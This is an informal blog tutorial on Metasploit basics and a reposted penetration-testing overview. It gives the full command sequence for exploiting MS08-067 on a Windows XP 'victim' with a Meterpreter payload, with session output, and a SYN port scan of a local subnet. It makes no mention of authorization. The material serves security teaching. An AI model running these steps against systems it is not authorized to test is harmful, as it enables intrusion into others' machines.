Metasploit Basics Part 2 - Using The Inbuilt Codes

Welcome to the Metasploit Basics Part 2 . Make sure you read the first part here before reading this

In this part we will talk about using the Exploits , Payloads , Auxiliary , Nops and Encoders

I think i don't need to explain what are these because it is already discussed in the first part 

Metasploit have


+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops


This may vary in your metasploit according to your version.


The Basic use of metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

Now time for a example  

Type "show exploits"  see the list of exploits available. Many of the exploits listed here are going to work against the target servers.But the difficult part is to know if the exploits will work or not =P


I will use 

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Now time to see the exploit commands we type "help"

msf exploit(ms08_067_netapi) > help

Many commands arrives but i needed to check the exploits commands :( Yeh got it it is in the last :)

Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    reload        Just reloads the module
    rexploit      Reloads the module and launches an exploit attempt

Now it is time to see some information about the exploit 

type "info" to see this all magic happen

you will see many information about the exploit like name,version,available targets etc 

in the above we were just seeking at the information about the exploit but the original stunt now comes

We will set the payload that will work after the exploitation is successful

To see the available payloads type "show payloads"

Now we will select a payload i prefer windows/meterpreter/bind_tcp

msf > exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

  type " show options " to see all available options that we have to fill up.

We need to set the RHOST ( The Victim ). We type set RHOST xxx.xxx.xxx.xxx ( X - The Ip Adreess) 
Now when you type show options you will see the RHOST will be filled with the ip address :)



The options varies from exploit to exploit sometimes it may even ask LHOST which you have to fill by your local ip or your computer ip that is also same you have to type set LHOST xxx.xxx.xxx.xxx


The 'set' command allows you to configure Framework options and parameters for the current module you are working with. 


after all the options are filled up time to check the host before trying exploit it .. 

We have a system, we have an exploit.  Are we going to be able to compromise the system?  Now is the time to find out. To perform the check type "check ". This may not work on all exploits.  This will see if the server or target appears vulnerable. For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary


Now if you are sure all things went right type the command " exploit "

If successful you will see something like ( Appropriate )

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:51333 -> xxx.xxx.xxx.xxx:4444)

[*] Exploit completed, 

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1... 

The basic Steps used

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST [TARGET IP]
msf exploit(ms08_067_netapi) > exploit

Now you own the PC it is yours you can do any thing with it i will not explain those here because another article wants it

The article is becoming longer . I have to make you understand auxiliary , nops and encoders in brief

The Auxiliary modules perform scanning, fuzzing, sniffing, information gathering and much more . This module does not give you a shell but they are equally important as the exploit and payloads.

I will take offensive security's help i cant write so much my hand is paining

Auxiliary Example

Port Scanning

In addition to running Nmap, there are a variety of other port scanners that are available to us within the framework.

msf > search portscan
[*] Searching loaded modules for pattern 'portscan'...

Auxiliary
=========

   Name                        Description
   ----                        -----------
   scanner/portscan/ack        TCP ACK Firewall Scanner
   scanner/portscan/ftpbounce  FTP Bounce Port Scanner
   scanner/portscan/syn        TCP SYN Port Scanner
   scanner/portscan/tcp        TCP Port Scanner
   scanner/portscan/xmas       TCP "XMas" Port Scanner 

The Result

msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf auxiliary(syn) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliary(syn) > set PORTS 80
PORTS => 80
msf auxiliary(syn) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run

[*] TCP OPEN 192.168.1.1:80
[*] TCP OPEN 192.168.1.2:80
[*] TCP OPEN 192.168.1.10:80
[*] TCP OPEN 192.168.1.109:80
[*] TCP OPEN 192.168.1.116:80
[*] TCP OPEN 192.168.1.150:80
[*] Auxiliary module execution completed

Read More

Here is also a youtube video with another example

 NOPS

The simplified NOP mixin provided in Msf::Simple::Nop extends each nop module instance with a method called generate_simple. This method takes the length of the sled to generate and the hash of options that should be used for the generation. On success, the return value is a buffer that is encoded using the Msf::Simple::Buffer class using the format specified in the option hash as the ’Format’ element. If no format is specified, the raw version of the NOP sled is returned.

Encoders 

Encoder modules are used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed. To accomplish this, most encoders will take the raw form of the payload and run it through some kind of encoding algorithm, like bitwise XOR. After the encoded version is generated, a decoding stub is prefixed to the encoded version of the payload. This stub is responsible for performing the inverse operation on the buffer attached to the decoder when it executes. After the decoder restores the payload to its original form, it will transfer execution to the start of the now normalized payload.
To support the above described encoder model, the Metasploit framework provides the Msf::Encoder class which inherits from the Msf::Module base class. All encoders must inherit from the Msf::Encoder class at some level to ensure that encoder-specific methods are included in the derived class.
Like the module information hash, encoders have some specialized information hash elements that describe information about the encoder being used. The information that encoder modules need to describe are the attributes of the decoder which is conveyed through the Decoder information hash element. The Decoder hash element references another hash that contains decoder specific properties. These are described in the table shown in figure 6.3 along with their types and module instance accessors.

Explaining NOPS and Encoders will make newbies confuse. So i will explain these latter

This is just the basic usages and was totally written for beginners more advance information about metasploit is waiting to be posted.
Replies , Questions and Suggestion regarding this topic is welcomed

References 
Off Sec
metasploit
Local Host :P


Part 1 | Part 2

Introduction to Penetration Testing

This article is just to give you the Basic knowledge and making you understand the Fundamentals of Penetration Testing


Goal of this Article 

q 

• An overview of how Vulnerability Assessment (VA) & Penetration Testing (PT) is done
• qDefining scope of the assessment
• qTypes of Penetration Testing
• qA brief understanding on how Buffer Overflow works
• qHow vulnerabilities are scanned and exploited
• qWhat are the end results
• qWhat a Penetration Testing Report should contain  

                                           Differentiating VA and PT

Vulnerability Assessment (VA)

In this case the security auditor has to only scan for the vulnerabilities in the server or application and filter out the false positives from the scan output by mapping them with the actual vulnerabilities associated with the target host.

VA Scope Includes:

• The VA test can be done both internally and externally

• No vulnerabilities are exploited

• No dangerous attacks like DOS and Buffer Overflow attacks are used

• Automated vulnerability scanning tools line Nessus, Retina or ISS are used 

Penetration Testing (PT)

In this case the security auditor or the penetration tester not only has to scan for the vulnerabilities in the server or application but also has to exploit them to gain access to the remote server.

PT Scope Includes:

• The PT test is done both internally and externally

• Vulnerabilities are exploited

• Dangerous attacks like DOS and Buffer Overflow attacks are used depending upon 

  the customer’s willingness to do so

• Automated vulnerability scanning tools and as well as exploits are used 

                                 

             Types Of Penetration Testing

Black Box Penetration Testing

• Pen tester has no previous knowledge of the remote network

• • Simulating  a real world hacking by a hacker who has no knowledge 

         (E.g. Operating System running,  application running, device type and

          network topology etc..) of the remote network environment 

White Box Penetration Testing

• • Have the   knowledge of the remote network
• •Type of Pen tester network devices (i.e. Cisco gear, TCP/IP),
• •WebServer details (i.e., Apache/*nix or Apache/Win2k),
• •Operating System type (i.e., Windows/*nix),
• •Database platform (i.e., Oracle or MS SQL),
• •Load balancers (i.e. Alteon),
• Firewalls (i.e. Cisco PIX).. etc
• •Simulating  a attack by a hacker who is having a detailed knowledge of the remote network environment  

 

                  Scope Of Penetration Testing

Non-Destructive Test

• •Scans the remote hosts for possible vulnerabilities
• •Analyze and confirm the findings
• •Map the vulnerabilities with proper exploits
• •Exploit the remote system with proper care to avoid disruption of service
• •No highly critical Denial of Service (DoS) attack is tried

Destructive Test

• •Scans the remote hosts for possible vulnerabilities
• • Analyze and confirm the findings
• • Map the vulnerabilities with proper exploits
• •All highly critical Denial of Service (DoS) attacks (e,g like buffer overflows are tried

                                           ~~~ Moving On To Penetration Testing ~~~

Penetration testing includes some steps ... 

• qFingerprinting or Footprinting
• qNetwork Information Gathering
• qSurveying / Network Mapping
• qPorts Scanning and Services Identification
• qEvading Firewall Rules
• qAutomated Vulnerability Scanning
• qExploiting Services for Known Vulnerabilities
• qExploiting Web-Based Authorization
• qPassword Cracking / Brute Forcing
• qDenial of Services (DoS) Testing
• qEscalation of Privileges

                                   FLOW CHART

 

 

1. Information Gathering

This is the first step for any remote host Penetration Testing. Here the pen-tester try to gather maximum information on the remote host to precise the attack.

 

Expected Results:

• qZone Transfer Information
• q Domain Registration Information
• q Email IDs
• q IP Addresses Range

 

Sample Screenshot (Server queried for Zone-Transfer Info):

 

(Information Gathered from Zone-Transfer Info)

 

2. Footprinting / Fingerprinting

In this step, information like WebServer and OS type running on remote host are gathered to further precise the attack.

 

Expected Results:

• qRemote server OS type
• q Remote server web-server type
• q Applications running on remote server

Sample Screenshot (Banner displaying OS, application & WebServer details):

 
3. Network Surveying / Network Mapping 

A network survey serves often as an introduction to the systems to be tested. It is best defined as a combination of data collection, information gathering, and policy control. 

Expected Results:

• qFirewall / Routers / IDS Discovery
• qPossible Local Network / Subnet Discovery
• qIP Addresses Range
• qNetwork Topology Mapping
• qISP information

Sample Screenshot (Local address of the remote network discovered):

 

  4. Port Scanning & Services Identification

Port scanning is the invasive probing of system ports on the transport and network level. This module is to enumerate live or accessible Internet services as well as penetrating the firewall to find additional live systems.

 

Expected Results:

• qOpen, closed or filtered ports
• qServices Identification

Sample Screenshot (NMAP port scan output):

 

 

5. Evading Firewall Rules

In this phase, firewall evasion techniques are used to bypass firewall rules. This can further help in port scanning, remote host detection and remote network discovery.

Expected Results:

• q Mapping of firewall configuration rules
• q Partial Access to devices behind the firewall

Sample Screenshot : (Trace Route using UDP packets)

 

 

It is clear from the two screenshots  that the packet filtering device (i.e. Firewall / Router) is not configured to block UDP packets. 

6. Automated Vulnerability Scanning

The focus of this module is identifying, understanding, and verifying the weaknesses, misconfigurations and vulnerabilities associated with remote host. The scanning is done using automated tools or scripts to make the process faster. 

Expected Results:

• qList of vulnerabilities associated with each remote services
• qList of possible denial of service vulnerabilities
• qPossible misconfiguration on the remote server

Sample Screenshot 

What is MVS ?

MVS is an automated Internet Vulnerability Scanner which can scans for web based vulnerabilities (Ex: CGI/IIS Unicode) associated with a remote host running a web server. The scanner displayed, shows that the target host is vulnerable to IIS Unicode. The vulnerable string has been highlighted in the below screen shot

7. Exploiting Services For Known Vulnerabilities 

This is the most important phase of penetration testing. Here the weaknesses found in the remote services are exploited using openly available exploits or self developed or customized exploits. 

Expected Results:

• q Gaining Access to the system
• q Retrieving hidden information
• q Domain Hijacking
• q Spamming Mail Servers

Sample Screenshot (FrontPage fp30reg.dll Overflow Exploit):

 

 

Here the web application flaws are exploited to gain access to restricted information. The Web-Based authentication is exploited by using XSS (Cross-Site Scripting) or SQL injection or MITM (Man-in-the-middle) attacks etc... 

Expected Results: qAccess to restricted / confidential information q Control over web configuration q Can also leads to gaining access over other servers Sample Screenshot (SQL injection used for gaining access to admin page):

  8. Password Cracking or Brute Forcing 

Password cracking is the process of validating password strength through the use of automated password recovery tools that expose either the application of weak  passwords due to human factors. 

Password Lists and Words List are use for validating the password in this process

Expected Results: qList of user login IDs or passwords q List of authentication PINs or Password Sample Screenshot (Brute Forcing using Brutus):

 

9. Denial of Service (DoS) Testing 

 

Denial of Service (DoS) is a situation where the applications or services running over the remote system stops functioning and prevents authenticated network users or devices to access it. 

Expected Results: Disruption of Services q List of other possible DoS vulnerable associated with the systems qSabotage of remote network Sample Screenshot (DOS attack for CISCO):   10. Escalation of Privileges    Escalation of Privileges is the type of rights the attacker gains over the remote system. It is the final stage of the remote host hacking where the attacker gains complete control over the remote system.

 

Expected Results: q Gain administrator / super user rights q Gain privilege to retrieve or modify confidential data q Gain control over server configuration q Gain Control over other servers attached to it   Sample Screenshot    ============================================================= It took me around two days to reproduce the entire paper from the ppt into a webpage.  This paper was written by Debasis Mohanty but was not published in webpage form till now so i tried my best to convert it into a webpage. Download the original PPT by him and learn the basics of Buffer Overflow written for beginners only - GO HERE